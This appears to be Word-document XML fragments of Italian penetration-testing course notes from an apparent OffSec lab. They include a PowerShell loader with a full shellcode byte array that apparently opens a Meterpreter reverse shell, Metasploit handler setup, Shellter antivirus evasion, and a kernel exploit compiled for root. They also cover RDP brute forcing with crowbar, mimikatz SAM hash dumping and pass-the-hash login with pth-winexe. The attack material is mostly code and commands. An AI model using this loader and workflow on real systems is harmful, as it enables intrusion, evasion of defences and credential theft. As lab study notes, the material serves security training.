        <w:tab/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[DllImport("msvcrt.dll")]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public</w:t>
        <w:tab/>
        <w:t xml:space="preserve">static</w:t>
        <w:tab/>
        <w:t xml:space="preserve">extern</w:t>
        <w:tab/>
        <w:t xml:space="preserve">IntPtr</w:t>
        <w:tab/>
        <w:t xml:space="preserve">memset(IntPtr</w:t>
        <w:tab/>
        <w:t xml:space="preserve">dest,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">uint</w:t>
        <w:tab/>
        <w:t xml:space="preserve">src,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">uint</w:t>
        <w:tab/>
        <w:t xml:space="preserve">count);';</w:t>
        <w:tab/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$winFunc</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Add-Type</w:t>
        <w:tab/>
        <w:t xml:space="preserve">-memberDefinition</w:t>
        <w:tab/>
        <w:t xml:space="preserve">$code</w:t>
        <w:tab/>
        <w:t xml:space="preserve">-Name</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"Win32"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">-namespace</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Win32Functions</w:t>
        <w:tab/>
        <w:t xml:space="preserve">-p</w:t>
        <w:tab/>
        <w:t xml:space="preserve">assthru;</w:t>
        <w:tab/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[Byte[]];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[Byte[]]</w:t>
        <w:tab/>
        <w:t xml:space="preserve">$sc</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">0xfc,0xe8,0x82,0x0,0x0,0x0,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30</w:t>
        <w:tab/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,0x8b,0x52,0xc,0x8b,0x52,0x14,0x8b,0x72,0x28,0xf,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x</w:t>
        <w:tab/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61,0x7c,0x2,0x2c,0x20,0xc1,0xcf,0xd,0x1,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0</w:t>
        <w:tab/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x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x1,0xd1,0x51,0x8b,0x59,0x20,0x1,0xd3,0x8b,0x49</w:t>
        <w:tab/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,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x1,0xd6,0x31,0xff,0xac,0xc1,0xcf,0xd,0x1,0xc7,0x3</w:t>
        <w:tab/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8,0xe0,0x75,0xf6,0x3,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x1,0xd3,0</w:t>
        <w:tab/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x66,0x8b,0xc,0x4b,0x8b,0x58,0x1c,0x1,0xd3,0x8b,0x4,0x8b,0x1,0xd0,0x89,0x44,0x24,0x24,0</w:t>
        <w:tab/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x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x</w:t>
        <w:tab/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33,0x32,0x0,0x0,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x7,0xff,0xd5,0xb8,0</w:t>
        <w:tab/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x90,0x1,0x0,0x0,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x0,0xff,0xd5,0x6a,0xa,0x68,0x</w:t>
        <w:tab/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ac,0x10,0x74,0x8b,0x68,0x2,0x0,0x11,0x5c,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,</w:t>
        <w:tab/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0x50,0x68,0xea,0xf,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x</w:t>
        <w:tab/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61,0xff,0xd5,0x85,0xc0,0x74,0xa,0xff,0x4e,0x8,0x75,0xec,0xe8,0x61,0x0,0x0,0x0,0x6a,0x0</w:t>
        <w:tab/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,0x6a,0x4,0x56,0x57,0x68,0x2,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x0,0x7e,0x36,0x8b,0x3</w:t>
        <w:tab/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6,0x6a,0x40,0x68,0x0,0x10,0x0,0x0,0x56,0x6a,0x0,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x9</w:t>
        <w:tab/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3,0x53,0x6a,0x0,0x56,0x53,0x57,0x68,0x2,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x0,0x7d,0x</w:t>
        <w:tab/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22,0x58,0x68,0x0,0x40,0x0,0x0,0x6a,0x0,0x50,0x68,0xb,0x2f,0xf,0x30,0xff,0xd5,0x57,0x68</w:t>
        <w:tab/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,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0xc,0x24,0xe9,0x71,0xff,0xff,0xff,0x1,0x</w:t>
        <w:tab/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c3,0x29,0xc6,0x75,0xc7,0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x0,0x53,0xff,0xd5;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C:\Users\offsec\Desktop&gt; powershell.\av_test.ps1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**se ci da policy non valide allora...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PS</w:t>
        <w:tab/>
        <w:t xml:space="preserve">C:\Users\offsec\Desktop&gt;</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Get-ExecutionPolicy</w:t>
        <w:tab/>
        <w:t xml:space="preserve">-Scope</w:t>
        <w:tab/>
        <w:t xml:space="preserve">CurrentUser</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Undefined</w:t>
        <w:tab/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PS</w:t>
        <w:tab/>
        <w:t xml:space="preserve">C:\Users\offsec\Desktop&gt;</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Set-ExecutionPolicy</w:t>
        <w:tab/>
        <w:t xml:space="preserve">-ExecutionPolicy</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Unrestricted</w:t>
        <w:tab/>
        <w:t xml:space="preserve">-Scope</w:t>
        <w:tab/>
        <w:t xml:space="preserve">C</w:t>
        <w:tab/>
        <w:t xml:space="preserve">urrentUser</w:t>
        <w:tab/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PS</w:t>
        <w:tab/>
        <w:t xml:space="preserve">C:\Users\offsec\Desktop&gt;</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Get-ExecutionPolicy</w:t>
        <w:tab/>
        <w:t xml:space="preserve">-Scope</w:t>
        <w:tab/>
        <w:t xml:space="preserve">CurrentUser</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Unrestricted</w:t>
        <w:tab/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msfconsole --&gt; multi/handler --&gt; payload Windows/meterpreter/reverse_tcp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exploit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C:\Users\admin\Desktop&gt; .\av_test.ps1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meterpreter &gt; getuid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Shellter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è un dinamic shellcode injection tool più utilizzato per bypassare l' antivirus usa più tecniche per creare una backdoor valida e un eseguibile con payload shellcode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(supporta anche altri payload non solo meterpreter )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apt-cache search shellter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sudo apt install shellter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apt install wine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set LHOST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set LPORT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*set AutoRunScript post/windows/manage/migrate*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exploit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----&gt;Privilege Escalation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scoprire impostazioni del firewall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C:\Users\student&gt; netsh advfirewall firewall show rule name=all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--enumeration/privilege escalation su windows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c:\Tools\privilege_escalation\windows-privesc-check-master&gt;windows-privesc-check2.exe</w:t>
        <w:tab/>
        <w:t xml:space="preserve">-h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c:\Tools\privilege_escalation\windows-privesc-check-master&gt;windows-privesc-check2.exe</w:t>
        <w:tab/>
        <w:t xml:space="preserve">--dump</w:t>
        <w:tab/>
        <w:t xml:space="preserve">-G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--enumaration ed escalation su Linux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student@debian:~$./unix-privesc-check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nel caso della cve-2017-10000112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cat /etc/issue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uname -r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arch x86_64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searchsploit linux kernel ubuntu 16.04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gcc 43418.c -o exploit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ls-lah exploit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whoami (root)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--Brute Force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crowbar (network authentication cracking tool primary designed for the leverage SSH keys rather than passwords e funziona bene per RDP)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crowbar -b rdp -s 10.11.0.22/32 -u admin -C ~/password-file.txt -n 1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hash extraction is on LSASS (Local Security Authority Subsystem ) ma in quel caso se non si riesce ad accedere si utilizza mimikatz da amministratore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C:&gt; C:\Tools\password_attacks\mimikatz.exe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mimikatz #: privilege::debug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Privilege '20' OK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mimikatz #: token::elevate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NT AUTHORITY\SYSTEM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mimikatz #: lsadump::sam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//sam in questo caso era il nostro database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dati e tra tutti ci sta anche l'utente nostro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User:Offsec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Hash NTLM: 2892dfggf...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kali@kali: pth-winexe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kali@kali:pth-winexe</w:t>
        <w:tab/>
        <w:t xml:space="preserve">-U</w:t>
        <w:tab/>
        <w:t xml:space="preserve">offsec%aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2</w:t>
        <w:tab/>
        <w:t xml:space="preserve">eb3b9f05c425e</w:t>
        <w:tab/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//10.11.0.22</w:t>
        <w:tab/>
        <w:t xml:space="preserve">cmd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C:\Windows\system32&gt;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